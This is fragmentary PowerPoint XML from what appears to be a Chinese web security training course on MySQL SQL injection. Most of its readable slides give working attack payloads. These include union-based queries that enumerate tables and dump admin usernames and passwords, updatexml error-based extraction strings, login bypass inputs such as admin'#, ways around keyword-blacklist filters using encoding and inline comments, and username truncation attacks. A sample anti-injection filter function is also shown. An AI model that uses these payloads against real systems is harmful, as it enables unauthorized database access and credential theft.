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88" r:id="rId4"/>
    <p:sldId id="289" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="268" r:id="rId11"/>
    <p:sldId id="317" r:id="rId12"/>
    <p:sldId id="262" r:id="rId13"/>
    <p:sldId id="290" r:id="rId14"/>
    <p:sldId id="263" r:id="rId15"/>
    <p:sldId id="264" r:id="rId16"/>
    <p:sldId id="265" r:id="rId17"/>
    <p:sldId id="291" r:id="rId18"/>
    <p:sldId id="266" r:id="rId19"/>
    <p:sldId id="269" r:id="rId20"/>
    <p:sldId id="270" r:id="rId21"/>
    <p:sldId id="316" r:id="rId22"/>
    <p:sldId id="271" r:id="rId23"/>
    <p:sldId id="272" r:id="rId24"/>
    <p:sldId id="278" r:id="rId25"/>
    <p:sldId id="280" r:id="rId26"/>
    <p:sldId id="292" r:id="rId27"/>
    <p:sldId id="273" r:id="rId28"/>
    <p:sldId id="274" r:id="rId29"/>
    <p:sldId id="275" r:id="rId30"/>
    <p:sldId id="277" r:id="rId31"/>
    <p:sldId id="318" r:id="rId32"/>
    <p:sldId id="293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BE4"/>
    <a:srgbClr val="7DE2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714" y="2500439"/>
            <a:ext cx="7142573" cy="100952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4714" y="3602038"/>
            <a:ext cx="7142573" cy="56181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603102"/>
            <a:ext cx="12192000" cy="25489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安全培训         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>http://www.cracer.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1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69570" y="553085"/>
            <a:ext cx="6034405" cy="632460"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3600"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en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE4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572770" y="1555081"/>
            <a:ext cx="10515600" cy="4207859"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="0">
                <a:solidFill>
                  <a:schemeClr val="accent3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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE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C58B-1263-4BF1-AC00-D94967AC28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2E82-1B0D-4500-9A39-2FD7D9C8CF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64970" y="1818640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928806" y="495632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solidFill>
                <a:srgbClr val="1BA0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17096" y="5414799"/>
              <a:ext cx="1496695" cy="397510"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1BA0C9"/>
              </a:solidFill>
            </a:ln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en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>BY    Cracer</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" sz="20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3106" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2251075" y="2193290"/>
            <a:ext cx="7235825" cy="1439863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1BA0C9"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="914400" lvl="0" indent="-914400" algn="ctr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charset="0"/>
              </a:defRPr>
            </a:lvl1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WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="方正综艺简体" charset="-122"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>安全测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="方正综艺简体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25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="12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Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" kern="1200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注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" kern="1200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注释符：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>#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、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/**/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内联注释：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>union*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/*!50001union*/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句中的代替符号：</a:t>
            </a:r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%0a/%0D/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/*ADJFKLASDF--234U23SJFD AND 1=1*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代替空格</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/**/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%01</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分割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zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编码绕过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty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数据库结构对比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905" lvl="0" indent="-1905"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>access数据库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A网站：adata.mdb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>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>		表名(admin)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列名(user,pass)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	值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B网站：bdata.mdb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表名(admin)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列名(user,pass)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	值			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mysql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A数据库名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B数据库名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表名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	列名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				值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill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2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Mysql </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>注入原理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>
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>注入原理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判断注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>And 1=1 and1=2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判断多少列，数字报错减少，正常增加</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Order by 20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>联合查询，报字符列在第几列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> union select 1,2,3,4,5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在字符列上报相关信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库版本信息，用户，数据库名称（十六进制转换）。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>union select 1,version(),3,4,5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指定数据库，爆数据库表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>union select 1,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=0x6D7574696130313231</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指定表名爆列名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>union select 1,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=0x61646D696E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>id,name,adminpass,right_li,right_li_b,checks,level_id</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询数据信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>union select 1,group_concat(name,0x5c,adminpass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from  admin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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常见的防注入代码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function check_sql($x){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>	$inject=array("select","union","from","and","or");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$i=str_replace($inject,"",$x);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>	return $i;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/* function check_sql($Sql_Str) {//自动过滤Sql的注入语句。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    $check=preg_match('/select|insert|update|delete|\'|\\*|\*|\.\.\/|\.\/|union|into|load_file|outfile/i',$Sql_Str);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    if ($check) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>        echo '&lt;script language="JavaScript"&gt;alert("系统警告：\n\n请不要尝试在参数中包含非法字符尝试注入！");&lt;/script&gt;';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>        exit();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    }else{</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>        return $Sql_Str;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} */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绕过防注入代码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大小写绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%01</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编码绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty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3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Mysql </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>显错注入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显错注入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判断是否存在注入输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2448560"/>
            <a:ext cx="1126807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显错注入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显错注入有很多函数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floor()、extractvalue()、updatexml()、geometrycollection()、multipoint()、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polygon()、multipolygon()、linestring()、multilinestring()、exp()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dirty="0"/>
              <a:t>常用的前三种比较多</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们今天讲些</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的显错利用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显错注入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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>'and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+                                                                                                     #查看当前数据库用户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database()),0x7e),1)--+                                                                                              #查看当前数据库名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schema_name from information_schema.schemata limit 0,1),0x7e),1)--+                    #查看当前数据库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schema_name from information_schema.schemata limit 1,1),0x7e),1)--+                    #查看当前数据库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schema_name from information_schema.schemata limit 2,1),0x7e),1)--+                    #查看当前数据库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group_concat(schema_name) from information_schema.schemata),0x7e),1)--+         #查看所有数据库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='mysql'),0x7e),1)--+ </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>可以看出，以~开头的内容不是xml格式的语法，报错，但是会显示无法识别的内容是什么，这样就达到了目的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>有一点需要注意，updatexml()能查询字符串的最大长度为32，就是说如果我们想要的结果超过32，就需要用substring()函数截取，一次查看32位</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>这里查询前5位示意:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>'and updatexml(1,concat(0x7e,substring(hex((select database())),1,5),0x7e),1)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>'and updatexml(1,concat(0x7e,substring(hex((select group_concat(schema_name) from information_schema.schemata)),1,5),0x7e),1)--+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3590925" cy="6899910"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="5561351" cy="6899639"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-1"/>
              <a:ext cx="5561351" cy="6858002"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a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20000" contrast="-40000"/>
                        </a14:imgEffect>
                        <a14:imgEffect>
                          <a14:saturation sat="2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r="-119980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"/>
              <a:ext cx="5561351" cy="6899639"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="157E9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1855" y="887730"/>
            <a:ext cx="16605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evenim MT" panose="02010502060101010101" pitchFamily="2" charset="-79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Levenim MT" panose="02010502060101010101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7150" y="1744980"/>
            <a:ext cx="450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介绍与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常规操作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36590" y="18472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077585" y="22047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9850" y="2481580"/>
            <a:ext cx="3398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注入原理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9290" y="25838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altLang="zh-CN" sz="2000" b="1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90285" y="29413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29375" y="3215005"/>
            <a:ext cx="3871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显错注入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8815" y="33172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altLang="zh-CN" sz="2000" b="1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6099810" y="36747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2075" y="3951605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读写文件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71515" y="4053840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altLang="zh-CN" sz="2000" b="1" dirty="0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112510" y="4411345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53505" y="4615180"/>
            <a:ext cx="3858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微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Mysql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注入工具使用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82945" y="4717415"/>
            <a:ext cx="318770" cy="340360"/>
          </a:xfrm>
          <a:prstGeom prst="rect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altLang="zh-CN" sz="20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123940" y="5074920"/>
            <a:ext cx="422338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显错注入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'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='mysql' limit 0,1),0x7e),1)--+                                  #查看当前数据库的表名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='user' limit 0,1),0x7e),1)--+                              #查看user表的列名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='user' limit 0,1),0x7e),1)--+ </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>列用户名密码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>'and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(1,concat(0x7e,(select username from user limit 0,1),0x7e),1) #</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>'and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(1,concat(0x7e,(select password from user limit 0,1),0x7e),1) #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>%27and%20updatexml(1,concat(0x7e,substring(hex((select%20password%20from%20user%20limit%200,1)),44,75),0x7e),1)--+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后台绕过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select * from user where username='' and password=''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输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>admin'#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select * from user where username='admin'#' and password=''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输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>admin' or '1=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select * from user where username='admin' or '1=1' and password=''</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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b="0" dirty="0"/>
              <a:t>长字节截断攻击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条件：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>管理员和普通用户在一个表中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户名字段长度有一定限制比如长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个字符</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>普通用户在注册名称的时候可以吧用户名设置为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Admin+++++++++++++++++++++++++</a:t>
